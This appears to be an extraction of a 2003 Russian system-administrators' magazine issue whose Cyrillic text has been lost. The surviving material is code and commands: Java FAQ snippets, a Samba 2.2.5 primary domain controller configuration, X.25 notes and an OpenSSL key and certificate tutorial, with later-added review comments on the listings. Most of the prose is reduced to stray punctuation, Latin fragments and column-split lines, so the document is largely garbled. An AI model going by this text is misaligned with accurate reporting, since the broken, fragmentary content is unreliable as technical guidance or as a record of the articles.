
1(2) 2003

:
,

OpenSSL
SAMBA PDC

!

,
.

. ,
.
,

, . , -,
, . , , . , . - ,
, .
,
, . - .
,

PDC
( )
Windows SAMBA 2.2.5
:
SAMB PDC.

gus@horizont.com.ua

34

.25
, .25.

40

f3x@land.ru

12
OpenSSL



. .
.

CEBKA@smtp.ru

16
...

,

.
DNS?..

48

f3x@land.ru

!
.
. ?

*nix- ssh-, .
ssh,
host-based ,
.

wurger@yandex.ru

DNS

28

apotemkin@itinfo.spb.ru

CEBKA@smtp.ru

50

CEBKA@smtp.ru

,
,
. .

54

,
siteMETA
, ,
, .
SiteMET - .

info@meta.ua

60

Jav: ( II)
ClassLoader -


.
Linux?

hymnazix@aviel.ru

88

Linux !
Linux , . , Windows, Linux. Linux Windows,
.

daniel@siams.com

64

ColdFusion,
, -

92

andy_shev@mail.ru

apm@poptsov.ru

78

4, 15, 95

, , , , , , . ?
.

27, 58

FAQ JA
VA
JAV

BUGTRAQ

82
1(2), 2003

ubob@mail.ru

FAQ JAVA
:


. , Math.PI+""
3.141592653589793.
. ?
:
java.text.DecimalFormat.
,
:
/**
 * Fixed-point form of {@link #toS(double, int, boolean)}: formats {@code v}
 * with {@code d} fractional digits and no exponent.
 *
 * @param v value to format
 * @param d number of fractional digits
 * @return the formatted string, with '.' as decimal separator
 */
public static String toS(double v, int d) {
    final boolean exponentForm = false;
    return toS(v, d, exponentForm);
}
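/**
 * Formats {@code v} with exactly {@code d} fractional digits through a
 * {@link DecimalFormat} pattern ("0", "0.00", "0.00E0" ...).  The decimal
 * separator is always '.', whatever the default locale uses (the page's
 * example output is "3.141592653589793").
 *
 * @param v            value to format
 * @param d            number of fractional digits; values <= 0 give none
 * @param exponentForm true for scientific notation ("1.23E4")
 * @return the formatted number with '.' as decimal separator
 */
public static String toS(double v, int d,
                         boolean exponentForm)
{
    StringBuffer ptn = new StringBuffer("0");
    if (d > 0) {
        ptn.append(".");
        // the printed listing reads "for (; d>0; d)", which never terminates;
        // the decrement was lost in extraction
        for (; d > 0; d--) ptn.append("0");
    }
    if (exponentForm) ptn.append("E0");
    DecimalFormat f = new DecimalFormat(ptn.toString());
    // DecimalFormat uses the default locale's decimal separator (',' in many
    // locales); normalise to '.' so callers get a locale-independent string
    return f.format(v).replace(',', '.');
}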

:
Java- ( Java)?

:
Sun Java , Java-
Java C, ++
Pascal. ?
:
, !
, , , .
Java
native- ( ).
Just-In-Time HotSpot
, Java-,
,
C
10-100 Java.
- . .
. 2 a b (short) 20000.

a: a[k]= a[k]<b[k]? a[k]: b[k].
Java
native- C. ,
. Java :
// Element-wise minimum of a[] and b[] written back into a[], unrolled by four
// (the text above describes a[k] = a[k] < b[k] ? a[k] : b[k]).  The loop
// header and the four if-statements were split across two columns in the
// extracted listing and are re-joined here; aofs, aofsmax, bofs, a and b are
// declared outside this fragment.
for (; aofs < aofsmax; aofs += 4, bofs += 4) {
    if (a[aofs] > b[bofs]) a[aofs] = b[bofs];
    if (a[aofs + 1] > b[bofs + 1]) a[aofs + 1] = b[bofs + 1];
    if (a[aofs + 2] > b[bofs + 2]) a[aofs + 2] = b[bofs + 2];
    if (a[aofs + 3] > b[bofs + 3]) a[aofs + 3] = b[bofs + 3];
}

:
// Shutdown hook registered with the JVM; the page's listing leaves run()
// empty (cleanup such as removing temporary files would go here - compare
// the text on deleteOnExit()).
Thread cleanupHook = new Thread() {
    public void run() {
        ;
    }
};
Runtime.getRuntime().addShutdownHook(cleanupHook);

,
() ,
deleteOnExit() File.
!
Sun, Java, ,
Java-, finalize,
addShutdownHook deleteOnExit. , , ,
.

Pentium-III
800 MHz 256 Kb :
, Java
11.5 , C++ 6
. ( Sun Java SDK
1.4.1 Microsoft C++ Visual Studio
6.0, Windows 2000.) C++ MMX/SSE, 1.4 8 Java.
, Java, C : 25 Java, 19 12
MMX/SSE. (
, ,
.)

PDC
( )

WINDOWS

SAMBA 2.2.5

OpenSource, -
. , , ,
, ,
, . . ,
OpenSource, (,
). ( ) .
. , Samba.


Samba , , ,
UNIX, , Windows-.
, SAMBA UNIX-
SMB CIFS Microsoft,
,
MS Windows. ,
Samba Microsoft Windows NT 4.0 Server.
,
, ;
, Samba PDC.


, ASPLinux 7.2. , RedHat 7.2
, .
ASPLinux, ,
RedHat. , -
,
ASPLinux . , - , .

SAMBA-2.2.5.rpm RedHat 7.2 samba.org.


:
>

rpm -ivh samba-2.2.5.rpm

(
), , ,
, . , . ,
! man- man;
! /usr/sbin;
! /etc/samba;
! SWAT (
SAMBA Web-).
, ,
, Samba
. :
! samba-2.2.5.tar.gz;
! :
> tar xvzf samba-2.2.5.tar.gz

! :
> cd samba-2.2.5/source

! ( !):

1(2), 2003

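# Configure the from-source build.  The printed listing lost the leading "--"
# of every option and shows the shell's ">" continuation prompts; the options
# are restored here.
#   --with-msdfs      Microsoft Distributed File System support (see the text)
#   --with-configdir  directory that holds smb.conf
#   --with-winbind    winbind support
# NOTE(review): "--sysconfigdir" is kept as printed; the standard autoconf
# option is spelled "--sysconfdir" - check ./configure --help for this release.
./configure --prefix=/usr \
    --bindir=/usr/bin \
    --sbindir=/usr/sbin \
    --libexecdir=/usr/libexec \
    --datadir=/usr/share/samba \
    --sysconfigdir=/etc/samba \
    --with-msdfs \
    --with-configdir=/etc/samba \
    --with-winbind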

: , /usr/bin /usr/sbin
, ,
/etc/samba. ,
Samba /usr/local/samba.
, /lib, .
, /etc, /usr/local/etc
( FreeBSD). : with-msdf, Microsoft Distributed File System, , .
> make

> make install

: . - ,
make! ,
:
2.2.5 , 2.2.4

, ,
configure ,
make-. .

, Samba , . rpm,

/etc/samba. , . ,
.
. Samba
smb.conf. : cd /etc/samba
cp smb.conf smb.conf.bak.
smb.conf ,
. .
: [global],
, ,
shares, . , , [homes], : ,
.
, ;
- ,
[global].
, .


,
, [global],
.
, , ,
. :
#
#
#
#

( OS Level, )
. , NetBIOS- , . domain master, ,
SAMBA .
:

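# /etc/samba/smb.conf
# SAMBA configuration file
# Created by GUS 04.08.2002
# Last updated : 05.08.2002 by GUS
# (these four header lines are comments; their "#" markers were printed
#  separately in the extracted text and are restored here - without them
#  Samba would try to parse the lines as parameters)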

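[global]
; Basic setting for our server
; NetBIOS name for our server
netbios name = DREAM
; workgroup name, here - DOMAIN NAME
workgroup = DREAMHOUSE
; server description string (%v expands to the Samba version)
server string = DREAMHOUSE Primary Domain Controller running Samba %v

; Security settings
; (printed before the [global] header in the extracted text; every
;  parameter must live inside a section, so they are placed here)
; user-level security: clients must authenticate with a user account
security = user
; required by NT4 SP3+ and later Windows clients (see the discussion below)
encrypt passwords = yes
; act as the domain logon server
domain logons = yes
; only loopback and addresses starting with 10.150.150. may connect
hosts allow = 127.0.0.1 10.150.150.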

! security = user user

! netbios name = DREAM -

Windows- DREAM. , :
,
SAMBA DNS- . , SAMBA
;
workgroup = DREAMHOUSE , , , , , !
server string = DREAMHOUSE Primary Domain Controller
running Samba %v , Windows-. , PDC , Samba %v, %v SAMBA.

, , SAMBA ,
,
.
smb.conf :
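; PDC settings
; a high os level wins browser elections against Windows machines
os level = 64
domain master = yes
; the page spells this "preffered master"; that is not a parameter name
; Samba recognises (it would be skipped as unknown), "preferred master" is
preferred master = yes
local master = yes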

:
- ,
,
local master
browser, , local master browser
: ,
master browser. 4 -

!
!

SAMBA, , , SAMBA-PDC-FAQ,
SERVER DOMAIN, SHARE,
.
SAMBA, ;
encrypt passwords = yes
, ..
, -
NT-
Windows ( NT4.0+SP3), Windows Me.
,
Microsoft Samba;
domain logons = yes ;
hosts allow = 127.0.0.1 10.150.150.
(, , ),
SAMBA-. -, 127.0.0.1 (localhost) , FAQ SAMBA
, .
:
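; Various logon settings
; path - where to store user profiles
logon path = \\%N\profiles\%u
; home directory - where it is, and where it should be mounted
logon drive = Z:
logon home = \\homes\%u
; default domain logon script - generic script for all users
; NOTE : this is relative !!! DOS !!! path to the [netlogon] share
; (the script runs on every client at logon, so the [netlogon] share must
;  not be writable by ordinary users - the page later adds "read only = yes"
;  and "write list = admin" to it)
logon script = start.cmd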

:
! logon path = \\%N\profiles\%u ;
! logon drive = Z: ,
, logon home;
! logon home = \\homes\%u , ..
;


! logon script = start.cmd ,
.
: -,

NETLOGON
. -,
, , , .. *.BAT-,
NT *.CMD-.
, [global] ,
, shares ,
, .
:
; Netlogon share
; Serves the domain logon script named by "logon script" in [global].  The
; page later adds "read only = yes" and "write list = admin" here so that
; ordinary users cannot replace a script every client executes at logon.
[netlogon]
comment = Network logon service
path = /home/netlogon
browseable = No

[netlogon] .
. .
:
! comment = Network logon service
, Windows-;
! path = /home/netlogon ;
! browseable = No , ,
.
,

:
; Added to [netlogon]: everyone reads the logon script, only "admin" may
; write - ordinary users must not be able to change a script that runs on
; every client at logon.
read only = yes
write list = admin

, read only = yes , write list = admin, .


homes:
; Users home directories
[homes]
; description shown to Windows clients
comment = Home Directories
; %S is the requested service name, i.e. the user's own home share, so only
; that user can connect to it
valid users = %S
read only = No
; permission bits for files / directories created through the share
create mask = 0664
directory mask = 0775
; the [homes] template itself is not listed when browsing
browseable = No

,
, , ,
.

1(2), 2003

! comment = Home Directories

!
!
!

,
Windows;
valid users = %S
;
read only = No ,
;
create mask = 0664 directory mask = 0775 .

, ;
browseable = No , (,
).
; Users profiles
[profiles]
path = /home/samba/profiles
; 0600 / 0700: profile files and directories are accessible to their owner
; only (see the description that follows)
create mask = 0600
directory mask = 0700
browseable = No
; NOTE(review): no "read only = No" is set for this share; with Samba's
; default (read only = yes) clients could not write profiles back - verify
; against the intended setup.

, . .
:
! path = /home/samba/profiles ;
! create mask = 0600 directory mask = 0700
, , :
0600 rwx-xxx-xxx, ..
, ;
0700 rwx-xxx-xxx , .
! browseable = No
.
.
: , Windows NT Windows 9x - , , ,
. , Windows 9x
, .
:
; Printers
[printers]
comment = All Printers
; spool directory for print jobs submitted by Windows clients
path = /var/spool/samba
printable = Yes
browseable = No

. ,
- Windows SAMBA-


. , .
, .
:
! comment = All Printers ;
! path = /var/spool/samba ;
! printable = Yes ;
! browseable = No .
.
. .




(UNIX-!), ,
(, , Windows NT, SAMBA, UNIX
, ). GID
,
,
ASPLinux, 200 201.
admins:
> groupadd -g 200 admins

machines:
> groupadd -g 201 machines

RedHat Linux (
ASPLinux) :
> group -g 200 admins
> group -g 201 machines

:
# Create the netlogon share directory, group-writable (0775) and owned by
# root:admins so that members of "admins" can maintain the logon script
install -d -m 0775 -o root -g admins /home/netlogon

, , root
admins, , ,
.
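mkdir /home/samba /home/samba/profiles
# The page reads "chown 1757 ...", but chown takes an owner, not a mode: it
# would hand the directory to uid 1757 and leave the permission bits
# unchanged.  The intent (see the description that follows) is the mode:
# sticky bit plus world write, so every user can create a profile directory
# but only its owner can remove it.
chmod 1757 /home/samba/profiles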

/home/samba/profiles,
, ,
-

10




account, , .

. . :
! UNIX;
! SAMB.
!
: gus
:
>
>
>
>
>

useradd gus
passwd gus
New password:
Retype new password:
passwd: all authentication tokens updated successfuly

SAMB:
>
>
>
>

smbpasswd -a gus
New SMB password:
Retype new SMB password:
Added user gus

: , SAMBA,
, . :
> smbpasswd -e gus

,
Windows-, : SAMBA- , UNIX
. ? , .


SAMBA UNIX
,
[global] :
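; UNIX password syncing
; when a user changes the SMB password, Samba also runs "passwd program"
; and drives it with the "passwd chat" script (%n = the new password)
unix password sync = Yes
passwd program = /usr/bin/passwd %u
; The chat was spilled over several lines in the extracted text; it is one
; value.  The expect/send pairs must match the local passwd prompts exactly
; (the page notes it has to be adapted per system - compare the passwd
; output shown earlier).
passwd chat = *New*UNIX*password* %n\n *Retype*new*UNIX*password* %n\n *Enter*new*UNIX*password* %n\n *Retype*new*UNIX*password* %n\n *passwd:*all*authentication*tokens*updated*successfully*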

passwd chat: ,
, !


: ; . :
, SAMB, ASPLinux .

! ;
! passwd -l;
! ;
! ( $);
! .

, , . RedHat 7.2 7.3,


ASPLinux 7.3 .
: Samba 2.2.1-2.2.5
root
. , SAMB
root. SAMB
. root UNIX SAMBA . FAQ SAMB, ,
, , .
! . SAMB.
SAMB smbd
nmbd. , ,
; NetBIOS, :

RedHat 7.2
:
>/usr/sbin/useradd -g machines -d /dev/null -c machine
nickname -s /bin/false machine_name$
> passwd -l machine_name$
> Changing password for user machine_name$
> Locking password for user machine_name$

machine_name ,
, , - .
ASPLinux . :
> /usr/sbin/useradd -g machines -d /dev/null -c machine
nickname -s /bin/false machine_name
> passwd -l machine_name
> Changing password for user machine_name
> Locking password for user machine_name

> vipw

, ( ), $.
-
UNIX VI. :
>smbpasswd -a -m machine_name

machine_name NetBIOS- ; , ,
SAMB , -m.
! ,
! ? ,
SAMB, ..
. ,
:
NetBIOS-. .

2

RedHat 7.2 [global]
smb.conf :
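; Automatic machine-account creation (RedHat 7.2 variant).  The account gets
; no home directory (-d /dev/null, -M) and no login shell (-s /bin/false),
; so it cannot be used for an interactive login; it is put in the "machines"
; group created earlier.  The value was wrapped over two lines on the page.
add user script = /usr/sbin/useradd -d /dev/null -g machines -s /bin/false -M %u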

ASPLinux 7.2 , - ,
, (-) :

1(2), 2003

> nmbd -D
> smbd -D

.
? .
, /etc/rc.d/rc.local,
ala FreeBSD. ,
-, . .

, . , ( ACL), , , winbind .
Microsoft MS DFS. . . , ,
,
3-5 , .
P. S. 20 2002 SAMBA
2.2.7, :

. , , ,
, . .

11

.25

, .25,
, . ,
.25 .25
,

.
IT 1974

.
-

12

,
. ,


.

,
, .
,
.25, . .25
.75.

.25 , :
! PAD (Packet
Assembler Disassembler), -

- , , - ();


(connectionless),

;




IP
().

.25 (Switches, S),


(),


.
,
, .
-
PAD.
.

. PAD

.

. PAD , .25. PAD
. RS-232C. PAD
8, 16 24
.
PAD, .3, :
! , ;

1(2), 2003

! !


;

.25 ;
,
-
;

,
,
.


.25. PAD,
.25 .

,
PAD . PAD .25
,

RS-232.
C .28 ,
PAD.
,
. PAD :
.


,
.25, PAD:
, - , PAD,

.
, .3 .28 , telnet TCP/IP.

PAD , -

.

.25 .25 ,
.25.
.29,

PAD
, . , .25 ,
PAD ,
.25.

.25
.25 - , ( )
.
.25 16
.
.121 IT .
.25
.25,
.121.
.121 (
IDN International Data Numbers) , 14 . IDN (Data
Network Identification Code, DNIC). C
DNIC :
(3 ) ,
,
.25 . ,
10
.25.
10 , , .
, 1995
250, 1995
251. (National
Terminal Number, NTN).
DTE .25.

13


.25

ISO
7498.
ISO 7498 .25
.121
, 36 ( ) 37 (
).

, , ISDN, .25,
.

.25
.25 3
:
! .25
.21 bis DSI/CSU, , ,
;
! HDLC,

.

: LAP LAP-B;
! .25/3

.

,
.
,

.
LAP-B. , ,
, . LAP-B DTE
.
,

14

LAP-B


. LA-B
LLC2, . LAP-B
. (
8
),
( 128 ).
.25/3 ( , ) 14 , LAP-B.
LAP-B,
.25/3 ,
.

.
LAP-B Call Request .25.
.25

. ,
,
, . ,
, 251 456,

S1, ,
S1,
251 456, 251 456 12,
251 45. , , , .
.25
TCP/IP. ,


,
, .
, .
,
.25
, ,
. .25 LAP-B

LAP-B, .
. LAP-B , .25,
, LAP-B
.
,
.

.25

. ,
(1200-9600 /),
.

.25 . , ,
.
.

.25 . , .25 -

.

FAQ JAVA
: , , , ?
: System.currentTimeMillis(),
1970 .
: System.currentTimeMillis .
1 . , Windows NT/2000/XP 10 . .

,
.
.
native- C.
Windows
QueryPerformanceCounter QueryPerformance-Frequency,
Intel- 1 . , Intel -

1(2), 2003

:
?
: System.out.println.
\n
, C, C++, Perl
. Java \n, , -: 10
( ). , ,
Macintosh
: ASCII 13 (\r Java).
println. :
/**
 * Platform line separator, read once from the "line.separator" system
 * property; falls back to "\n" when the property is absent.
 */
public static final String lineSeparator =
        System.getProperty("line.separator", "\n");

:
// Two lines joined with the platform separator instead of a hard-coded "\n"
String twoLines = "1st line" + lineSeparator + "2nd line";
System.out.println(twoLines);

, , ,
. , , HTTP Web- HTTP-,
13 10, . println ,
print
\r\n .

15



OPENSSL



:
,

.
.
...

,
.
? , ,
. ,
. f(x), x .
,

,
,
.

;
: . , ,
(,
, ,
, , ).
?
:
-
, !
:
, ,

.
,

- ,

1(2), 2003

, .. . .
-
-,
MD SHA. ,
Unix crypt -
. , ,
salt, $1$
8
- MD5,

salt,
, .
salt ,

DES (56 ), salt . 56 ,
56 72057594037927936
(256) . ,
*nix MD5, () 128 ,
!
, ... :

( ).
.

, , , , .
,


. .
,
,
, ,
. , , -
,
. , , , . , ( )
. , . , - ( ,
).
:
(
, )
. -,
.
.
:

, , .
.

( )
(
).
( ,
,

). ,
,
.
,
,
,

.
,
(..
). ,

17


: , ,
,
.
:
,
.
.

,
.
,
.

, . , , :
, ( ). ,
(..
h(M)=h(M)) , , , . , . ,
.
. ,
,
.


.
, , SSH.
(
-

18

), .

, , ,
. ,
, ,
.

. ,
.

.
, .
. ,
. .
,
1024
(
),
2048 (OpenPGP).
128
. .
,
( ).

, .
,
RSA
DSA. . , -

(

DSA
1024 , RSA
, 1024 4096 ). :
! DES (56 );
! 3DES (168 );
! RC* (40 128 );
! Blowfish (128 );
! IDEA (128 ).
,
128 , , 128
, 128 . ,
cbc,
, .. cbc
,
.
,
(SSL secure socket layer),
( , ). ,
, , - , ,
,

, ,

(
:
, ).
, ,
. ,
-



(, , ),
.
(man-inthe-middle),

,
. ,
,
,
. ,
, (, , ).

.
:
!
( ,
, );
!
,
(
, ).
,
, ,

. , ,
, ,
,
.
.
, ,
PGP OpenSSL.

.
, .

1(2), 2003

:
, ,
, ,
, ,
SSH.
:
, ,
,

, (
,
? , - ...).
, :
, .
:
. (3DES, IDEA,
Blowfish).
( ), , .

, (

).
. !
, , -

. (
,
).
,
A B,

, B. , ,
.
/
. ,
.
: , , , 128-
, , , 1024
-
. :
2

.
(

http://
algolist.manual.ru), :


,
( , ).
, , .
OpenSSL
, SSL

. OpenSSL
. API SSL,
.

19


OpenSSL, .
OpenSSL

, , , .
OpenSSL ,
.
openssl list-standard-commands. (list-message-digest-commands)
(list-cipher-commands). ,
OpenSSL :
!
RSA DSA rsa, dsa,
dsaparam;
!
x509, ,
x509,
req, verify, ca, crl, pkcs12, pkcs7;
! enc, rsautl;
! dgst;
! S/MIME
s/mime;
! ssl s_client,
s_server.

! openssl rand [-out file] [-rand file]


num: num
:
# openssl rand 5
W~
#

! openssl ciphers [-ssl2] [-ssl3] [-tls1]

openssl speed md5 rsa idea blowfish


des 3des sha1

NAME: NAME, NAME



. :
L OW
(
128 );
MEDIUM (128 );
HIGH
( 128 );
ALL ;
NULL .


(
1000- ), .

(Celeron 366),
:


MEDIUM HIGH, . , :
(, MEDIUM:HIGH).

C ssl:
! openssl speed [___ ]:
, , ; , :

20

openssl.
, ,
, , s/mime, / . ,
. rsa
genrsa:
openssl genrsa [-out file] [-des | des3 | -idea] [-rand file] [bits]

genrsa
bits PEM, des (56
), des3 (3- des 168 ) idea (128
). ( , ,
). -out , stdout, file ( -out
openssl ). -rand
/ ( :),
seed
. -


- /dev/random /dev/
urandom,
, - , /var/log/messages
/boot/vmlinuz, , /dev/random,
*nixe ( -rand

). /dev/random /dev/urandom, , ,
/dev/random 32 768 .rnd
:
dd if=/dev/[u]random of=.rnd count=64

,
-rand EGD ,
, EGD http://
www.lothar.com/tech/crypto/.
-rand ,
,

. 4096- RSA:
# openssl genrsa -out /etc/openssl/
key.pem -des3 -rand /var/log/messages
4096
Generating RSA private key
.....++*...++++++++*
Enter PEM passphrase:
Verify PEM passphrase:


( ).
. rsa openssl rsa.
:
openssl rsa -in filename [-out file]
[-des | -des3 |-idea] [-check] [-pubout]

openssl rsa
,
-in -out.
-pubout,
-out ,
-in -

1(2), 2003

. ,
:
openssl rsa -in /etc/openssl/key.pem
-out /etc/openssl/pubkey.pem -pubout


des3
idea:
openssl rsa -in /etc/openssl/key.pem
-out /etc/openssl/key1.pem -idea

DSA openssl gendsa, genrsa, :


-, DSA
, -,
DSA , paramfile
openssl dsaparam, :
openssl dsaparam [-rand file{s}]
[-C] [-genkey] [-out file] numbits

numbits ,
- dsaparam
stdout DSA
, -genkey ,
, , DSA,
, openssl gendsa, genrsa,

, dsaparam:
# openssl gendsa -out /etc/openssl/
dsakey.pem -rand /boot/vmlinuz -idea
paramfile Enter PEM passphrase: Verify
PEM passphrase:

dsa openssl dsa, ( ) openssl rsa.



DSA:
# openssl dsa -in /etc/openssl/
dsakey.pem -out /etc/openssl/
pubdsakey.pem -pubout


openssl,
.



openssl enc -cipher openssl cipher, cipher
. :
! base-64 ( );
! bf (blowfish 128 );
! des (56 );
! des3 (168 );
! rc4 (128 );
! rc5 (128 );
! rc2 idea (128 ).

-in -out
. (
-k, ,
, ,

). ,
base64,
. openssl
cipher -d ( !), base64 -a.
(),

(salt), ,
,
( ). cbc ,
.
:
! , des3:
# openssl des3 -in file -out
file.des3

! :
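# Decrypt: the page reads "out file"; the option is "-out file" (the dash
# was lost in extraction), otherwise openssl rejects "out" as an unknown
# option.
openssl des3 -d -in file.des3 -out file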

21


! , - sha1 md5).
blowfish(bf),
base64:
# openssl bf -a -in file
-out file.bf64

! base64:
# openssl bf -a -d -in file.bf64
-out file

openssl dgst -hashalg


openssl hashalg (
, ).
openssl hashalg [-c]
file[s].

, -c,
, HEX
.

:
! md2 (128 );
! md4 (128 );
! md5 (128 );
! mdc2 (128 );
! sha (160 );
! sha1 (160 );
! ripemd160 (160 ).

:
md5 :
# openssl md5 -c file MD5(file)=
81:fd:20:ff:db:06:d5:2d:c3:55:b5:7d:3f:37:ac:94

! SHA1 :
# openssl sha1 file SHA1(file)=
13f2b3abd8a7add2f3025d89593a0327a8eb83af

, openssl
dgst

. :
openssl dgst -sign private_key
-out signature -hashalg file[s]

file private_key,
hasalg (-

22

openssl dgst -signature signature


-verify public_key file[s]

file,
public_key
signature.
Verification OK Verification Failure
. , , .
RSA

rsautl.
(
, ,
openssl
dgst). / :
openssl rsautl -in file -out file.cr
-keyin pubkey.pem -pubin -encrypt

file
pubkey.pem.
openssl rsautl -in file.cr -out file
-keyin secretkey.pem -decrypt

file.cr secretkey.pem.


openssl .
Openssl ,
.
.
. ,
( ), , , , ()
. ,
, -

(
, root CA).
, ,
,
( ).


, . , . , , ,
(

). , , http (apache+ssl). , ,

. x509, . Openssl PKCS#10,
Microsoft PKCS#12 ( openssl

), PKCS#7
CA ( )
,
DER (DER-
base64, ) . , DER- ,
base64, DER
,
DER- M$
( .cer),
( PEM DER):


PEM>DER openssl x509 -inform PEM
-in cert.pem -outform DER -out cert.cer
DER>PEM openssl x509 -inform DER
-in cert.cer -outform PEM -out cert.pem


( rsa
dsa).
,
.
, :
(PKCS#7)
. ( ), . ,
, .
: ;
(

); , . :
;

;
; (, CA,
) . ,
.
(
,
,
,
-

1(2), 2003

, ). ,
! :
. ,
openssl ...
openssl req.
,
, ,
.
,
( , # , ):
[ req ]
# size in bits of the key generated together with the request
default_bits = 2048
# file the generated private key is written to
default_keyfile = keyfile.pem
# name of the section that holds the distinguished-name (DN) fields
distinguished_name = req_distinguished_name
# prompt = no: take the DN values below literally instead of asking for
# them interactively (the text that follows describes the prompting variant)
prompt = no
[ req_distinguished_name ]
# DN fields, sample values as printed on the page
# country (two-letter code)
C=RU
# state or province
ST=Ivanovskaya
# locality / city
L=Gadukino
# organization
O=Krutie parni
# organizational unit
OU=Sysopka
# common name - what the certificate is issued to
CN=Your personal certificate
# e-mail address recorded in the certificate
emailAddress=certificate@gaduk.ru
#

prompt no,
(
),
. , (
). :
=
_default = __
_max =
_min =


:
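# Prompting variant of the request configuration (no "prompt = no"): each
# DN field is "name = prompt text", with optional name_default, name_min and
# name_max entries giving the default value and the allowed length.  Several
# prompt strings were wrapped over two lines in the extracted text; a value
# must stay on one line, so they are re-joined here.
[ req ]
default_bits = 1024
default_keyfile = privkey.pem
distinguished_name = req_distinguished_name
[ req_distinguished_name ]
countryName = Country Name (2 letter code)
countryName_default = RU
countryName_min = 2
countryName_max = 2
localityName = Locality Name (eg, city)
organizationName = Organization Name(eg, org)
organizationalUnitName = Organizational Unit Name (eg, section)
commonName = Common Name (eg, YOUR name)
commonName_max = 64
emailAddress = Email Address
emailAddress_max = 40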

: (, LDAP-),
, /usr/lib/ssl/openssl.cnf, .
openssl req (
,
,
, man req).
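# New certificate request (-new) with a freshly generated 2048-bit RSA key
# (-newkey rsa:2048).  The key goes to rsa_key.pem, encrypted with DES after a
# passphrase prompt (per the text); the DN comes from cfg.  Re-joined from the
# wrapped listing.
openssl req -new -newkey rsa:2048 -keyout rsa_key.pem -config cfg -out certreq.pem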

(-new)
rsa (-newkey
rsa:2048),
-keyout (
DES). -config.
openssl req -x509 -new -key
private_key.pem -config cfg -out
selfcert.pem -days 365

(-new) self-signed (-x509)



CA.
-key -config.
365
(-days), -days .

23



x509 openssl
x509.
CA. (DN, , ,
. .). :
openssl x509 -in cert.pem -noout
-text

.
,

: -fingerprint ( -sha1, -md5
-mdc2), -modulus (
), -serial, -subject, -issuer (, ), email, -startdate, -enddate:

(-req) -in, CA -CA


-CAkey.
(-out)
/usr/lib/ssl/openssl.cnf ( ).

. x509
, .
openssl x509 -in CAcert.pem -addtrust
sslclient -alias myorganization CA \
-out CAtrust.pem

-in
SSL
(sslserver

,
emailProtection

Certificate:
Data:
Version: 3 (0x2)
Serial Number: 0 (0x0)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=RU, ST=region, L=city, O=organization, OU=Sysopka,
CN=CEBKA/Email=CEBKA@smtp.ru
Validity
Not Before: Nov 9 08:51:03 2002 GMT
Not After : Nov 9 08:51:03 2003 GMT
Subject: C=RU, ST=region, L=city, O=organization, OU=Sysopka,

S/MIME).

CA.
self-signed ,
,
.

(

), (
- ).

,
, openssl
.
,
(, ,
),
,
.

CA self-signed :
! :

CN=CEBKA/Email=CEBKA@smtp.ru
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:c6:6b:3b:8e:f8:33:05:a0:dc:e1:38:8f:6a:68:
42:1c:21:33:aa:90:b6:8c:93:14:11:9b:69:94:8a:
3a:0e:42:29:b0:45:14:1b:f0:37:2c:f3:05:db:13:
06:a9:cd:eb:99:31:51:25:86:c8:69:e0:5e:8d:28:
04:8d:1f:08:37:d7:72:39:fe:05:57:61:68:95:bf:
5c:ae:13:f2:05:a1:29:c3:bf:3b:32:ca:1a:ff:22:
53:f9:32:92:78:fe:44:c3:e1:ca:42:5c:5f:d1:49:
da:1c:9f:34:06:04:ee:46:74:8d:11:68:ef:37:e2:
74:1e:d9:46:04:b8:7e:d5:c5
Exponent: 65537 (0x10001)
Signature Algorithm: md5WithRSAEncryption
3b:42:85:45:08:95:f3:f1:fc:8a:23:88:58:0e:be:e5:9b:56:
1e:c1:ff:39:28:4f:84:19:f8:3e:38:ef:98:34:d6:ee:e0:0a:
de:36:3a:5c:15:88:d7:2a:a4:0a:d5:dc:3e:b2:72:4c:82:57:
b8:fe:52:f6:e2:06:01:38:eb:00:0b:f2:a9:87:be:65:83:19:
13:50:ae:6c:f2:0a:07:14:e6:8c:60:cd:c5:a3:d1:e1:ea:da:
24:c2:6a:06:d5:dc:1c:71:c9:64:fa:9e:c9:ca:97:e2:06:84:
de:4c:69:b8:9a:af:66:14:8d:46:9a:00:53:13:c9:ab:10:b8:
09:c2
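# Sign a client request with the CA key (the command was broken across
# columns in the extracted text).  "-extensions" takes the name of a section
# inside the file given by -extfile; the page passes the file path a second
# time, which openssl cannot find as a section and refuses.  Replace
# EXT_SECTION (placeholder) with the section name from openssl.cnf.
openssl x509 -req -in clientreq.pem -extfile /usr/lib/ssl/openssl.cnf \
    -extensions EXT_SECTION -CA CAcert.pem -CAkey serverkey.pem \
    -CAcreateserial -out clientcert.pem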

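# CA key: 4096-bit RSA, encrypted with 3DES behind a passphrase prompt, the
# random pool seeded from randfile (the listing wraps the command over blank
# lines)
openssl genrsa -out CAkey.pem -rand randfile -des3 4096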

! self-signed :
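# Self-signed (-x509) CA certificate from the CA key, valid 365 days, with the
# DN taken from cfg
openssl req -new -x509 -key CAkey.pem -out CAcert.pem -days 365 -config cfg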


,
/usr/lib/ssl/misc/CA.pl -newcert,
(
, ) CA .
! , ,
:


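#!/bin/bash
# Issue a client certificate signed by the local CA and hand out an encrypted
# copy of the client key.
#
# Reconstructed from the article listing, whose heredoc values were split
# across two columns.  Differences from the listing (see the comments):
#   * scratch files are created under a private umask inside a mktemp
#     directory instead of the predictable /tmp/ssl-$$ and /tmp/.rnd;
#   * the exit status of "openssl req" is checked - the listing tested $?
#     after the rm that followed it, so a failed request was never noticed
#     and the reported error code was always 0;
#   * the signing step names the extension section explicitly
#     (-extensions v3_req) and creates the CA serial file on first use;
#   * OU is defined (the listing referenced $OU without setting it).

umask 077                         # everything this script writes is private to root

REQ="openssl req"
X509="openssl x509"
RSA="openssl rsa"
GENRSA="openssl genrsa"
O="company"
C="RU"
ST="region"
L="city"
OU=""                             # organizational unit (left unset in the listing)
PURPOSES="digitalSignature, keyEncipherment"
CERTTYPE="client, email, objsign"
CA="/etc/openssl/CAcert.pem"
CAkey="/etc/openssl/CAkey.pem"
OUTDIR="/etc/openssl/clientcert/"
CN="client"
BITS=2048
DAYS=365

# private scratch directory; the listing used /tmp/ssl-$$, a name another
# local user can predict and pre-create or symlink
TMP=$(mktemp -d /tmp/ssl.XXXXXX) || exit 1
# seed file for openssl -rand (the listing wrote it to the shared /tmp/.rnd).
# NOTE(review): /var/log/messages and /boot/vmlinuz are predictable inputs;
# they add to the seed but should not be relied on as the only entropy.
dd if=/dev/random of="$TMP/.rnd" count=64 2>/dev/null
RAND="/var/log/messages:/boot/vmlinuz:$TMP/.rnd"

if [ ! -d "$OUTDIR" ]; then
    mkdir -m 0700 "$OUTDIR"
fi
pushd "$TMP" > /dev/null

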